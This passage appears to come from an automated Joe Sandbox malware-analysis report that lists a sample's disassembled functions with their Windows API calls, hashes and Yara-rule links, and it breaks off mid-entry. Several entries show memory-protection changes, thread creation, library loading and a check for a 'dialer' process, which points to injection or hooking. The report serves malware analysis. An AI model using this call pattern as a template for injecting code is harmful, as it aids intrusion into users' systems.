Part of subcall function 00007FF72726C12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF72726C140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF72726BF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF72726BFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF72726C041

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: 0bb224ed14390f0cd164adf129a11f3dd125c7dafd874715d2e98d2d0fe9dbb0
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 4731FB11A0A14241FA54BB649F523B992E1DF47384FC4A03AE90D4B6D7DF2DB8878E31

Function 000001F91B3239E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 000001F91B323A66
VirtualAlloc.KERNEL32 ref: 000001F91B323AA0

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction ID: 8494eed6f30f04f64a204bc8be07fa62cc72b7ebeb54313b3d002bd1a31d79cc
Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
Instruction Fuzzy Hash: 9D31433221FA8785FB31AE15E0813AE66A2F3887E4F140575F5CD06BA8DF7DC5628B00

Function 000001F91B32328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000001F91B3232AE
PathFindFileNameW.SHLWAPI ref: 000001F91B3232BD

Part of subcall function 000001F91B323844: StrCmpNIW.SHLWAPI ref: 000001F91B32385C

Part of subcall function 000001F91B323790: GetModuleHandleW.KERNEL32 ref: 000001F91B32379E
Part of subcall function 000001F91B323790: GetCurrentProcess.KERNEL32 ref: 000001F91B3237CC
Part of subcall function 000001F91B323790: VirtualProtectEx.KERNEL32 ref: 000001F91B3237EE
Part of subcall function 000001F91B323790: GetCurrentProcess.KERNEL32 ref: 000001F91B323809
Part of subcall function 000001F91B323790: VirtualProtectEx.KERNEL32 ref: 000001F91B32382A

CreateThread.KERNEL32 ref: 000001F91B32330B

Part of subcall function 000001F91B321D14: GetCurrentThread.KERNEL32 ref: 000001F91B321D1F

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 8995d56428e761bb532f8bb1f4f59946e230cd47d8b45a073a85f93f88cd4606
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: AE11653062E64389FB60BF21F9853FE1296A7547B4F5C41749A46865A1EF78C57A8200

Function 000001F91B324DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001F91B324DF4
VirtualProtect.KERNEL32 ref: 000001F91B324E37
FlushInstructionCache.KERNEL32 ref: 000001F91B324E4C

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
Instruction ID: 44ff97e0b351837d50cb721b9a71f71668a221f9f7f561b8c2f96628a5abc8a7
Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
Instruction Fuzzy Hash: 4AF0123521DA06C0D631AF05E4403AE6BA1F3887E4F181171BA8D03B69CB38C6A28B00

Function 00007FF727278D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF727278D44), ref: 00007FF727278D59
TerminateProcess.KERNEL32(?,?,?,00007FF727278D44), ref: 00007FF727278D64
ExitProcess.KERNEL32 ref: 00007FF727278D73

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: 8d34cda919779dcf83414300c23769cd4bf1141f1de5a960ac73c11f89d4341b
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: CDD06720B1860687EA543B715F9A17992B19F9A751F94143CD84A4A3A7CF3DA80A4B70

Function 000001F91B2F273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001F91B2F27DB
LoadLibraryA.KERNELBASE ref: 000001F91B2F285E

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 1ccc76b4cbf13a106b42925d7fab7e4759d56690e7cfb82d9f09a36cd1d5a7c1
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: D7612332B0529687EB54EF1590007BD7393F766BA4F6C8939EF5A07788DA38D856C700

Function 00007FF72726F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72726F4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72726F597

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction ID: d5b98cc04ea8960ac729740b88bc491c7558798f16bfa6bab5335813abfc1bb1
Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction Fuzzy Hash: B251B861B0924245FE24ED259E0067AA2E1FF47BA4F94863ADE7D477D9CF3CD4428E20

Function 000001F91B321ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000001F91B321628: GetProcessHeap.KERNEL32 ref: 000001F91B321633
Part of subcall function 000001F91B321628: HeapAlloc.KERNEL32 ref: 000001F91B321642
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B3216B2
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B3216DF
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3216F9
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321719
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B321734
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321754
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B32176F
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B32178F
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3217AA
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B3217CA

Sleep.KERNEL32 ref: 000001F91B321AD7
SleepEx.KERNEL32 ref: 000001F91B321ADD

Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3217E5
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321805
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B321820
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B321840
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B32185B
Part of subcall function 000001F91B321628: RegOpenKeyExW.ADVAPI32 ref: 000001F91B32187B
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B321896
Part of subcall function 000001F91B321628: RegCloseKey.ADVAPI32 ref: 000001F91B3218A0

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: 18f3ffec59d8cf1e5afa28952b6053f02dfc28ca0b951f5ba4caeeea138d7a92
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 7131A87921AE4751EB50BF27DB413FD63A6AB44BE0F1C54B19E0987695EF24C8738210

Function 00007FF727279E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF727279CE5,?,?,00000000,00007FF727279D9A), ref: 00007FF727279ED6
GetLastError.KERNEL32(?,?,?,00007FF727279CE5,?,?,00000000,00007FF727279D9A), ref: 00007FF727279EE0

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 766cbbdda8a6eeea38808c7bac284e9bcaecef7f5f45e04ce3dfe082177b4945
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: F5218011B1C78241FB90B764AF5027DA2E1DF8A7A0F945239D96E5B3D2CF6CA4428B20

Function 00007FF72727B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF72727B5DD), ref: 00007FF72727B490
GetLastError.KERNEL32(?,?,?,?,?,00007FF72727B5DD), ref: 00007FF72727B49A

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: 303eead3589afe6813b115aa3c9923a1967ccf8ae581c23888bc17542eafc2bf
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 6711C861708B8181DA10AB25AE14169B3B1EB46BF4F940331EE7D4BBE5CF3CD0528B10

Function 00007FF727279C58 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C6E
GetLastError.KERNEL32(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C78

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: bb91621a1c8cd27d9823a293530d54fc6922f846e711fd56abedb0cc166d3d3f
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: C9E04610F0868282FF087BB2AF4517A92F1DF9A740F904038C90D9A261EF3C68478E30

Function 000001F91B323844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

StrCmpNIW.SHLWAPI ref: 000001F91B32385C

Strings

dialer, xrefs: 000001F91B323855

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
Instruction ID: 69db7227c35e56c416ded0af5df670c04cc034a984b27358d7187312f541d5e7
Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
Instruction Fuzzy Hash: 6AD05E7035A20B8AFB18AFA688C87B52362EB047A4F8C4030990005160DB1899AE9A10

Function 00007FF72727B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72727B1E4

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 030692ad8820f1142cb68a7dae80780604cf6e6f18ec28bedc5996b8449e35f6
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 0D41B03290934187EA24AB19AB4127DB3F1EB57B91F941131DA8E8B691CF3CE503CB61

Function 00007FF7272676A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF72726774A

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 941833cdd6d9a3473ebad575b8c115bf759600ca6544244daae46ef6744f2c78
Instruction ID: 76b49e14e8cf7171e35c856531ee843f0647b07e8e79dc3d295b6f7d2b780f4b
Opcode Fuzzy Hash: 941833cdd6d9a3473ebad575b8c115bf759600ca6544244daae46ef6744f2c78
Instruction Fuzzy Hash: F7216F21B1965246FA11BE16AF043BAE6A1FF47BD4FC89435DD0D0A786DF7DE042CA20

Function 00007FF72727AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72727ACD2

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: 137ed516a5d77fd78dfcabce804b86d418527f14fe4b198e71d8239ad0b2c553
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: B1316D21E1864286F711BB199F4137DA6F0EB52BA1F910239EA1D0B3D2CF7CE4428B35

Function 00007FF727278C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF727278CA7

Part of subcall function 00007FF727278DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF727278DC5
Part of subcall function 00007FF727278DA0: GetProcAddress.KERNEL32 ref: 00007FF727278DDB
Part of subcall function 00007FF727278DA0: FreeLibrary.KERNEL32 ref: 00007FF727278E02

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction ID: d649420fba7b55c5369fa07c55c7e8e2f8dfca3da56952c23cc68b01ef67bbf9
Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
Instruction Fuzzy Hash: 03219F32A1570589EB24AF74CA412FC73F4FB05718F94463AD62C4AAD5DF38D446CB60

Function 00007FF7272752A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF727275209

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction ID: ed1c61d44b5e6d886afc248af1dfafcaefd3b0997b331501b0c82e8d9d3d60bf
Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
Instruction Fuzzy Hash: 3C116521A1D65142EA60BF529B0117EE2F8EF57B80F944135EA4C5FA95CF3CD442CF60

Function 00007FF727285664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF727285687

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction ID: f198c3fc4c5ccb75b498119b0590a803f6dab33fcce2e46331b5b47a36cf9f8f
Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
Instruction Fuzzy Hash: 0321DA3260865186DB619F19DA40379B2F1FB86B94F944334D65D876D9DF3DD402CF20

Function 00007FF72726F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72726F730

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction ID: 432756ddce5226090d12b2c10987528f0e32707aae9a06fdb6aec51cf237261f
Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
Instruction Fuzzy Hash: 51018221A0874240EA05EB565E01469E6F5EB57FE0F888635EE5C57BD6DF3CD4038B10

Function 00007FF72727720C Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72727724A

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
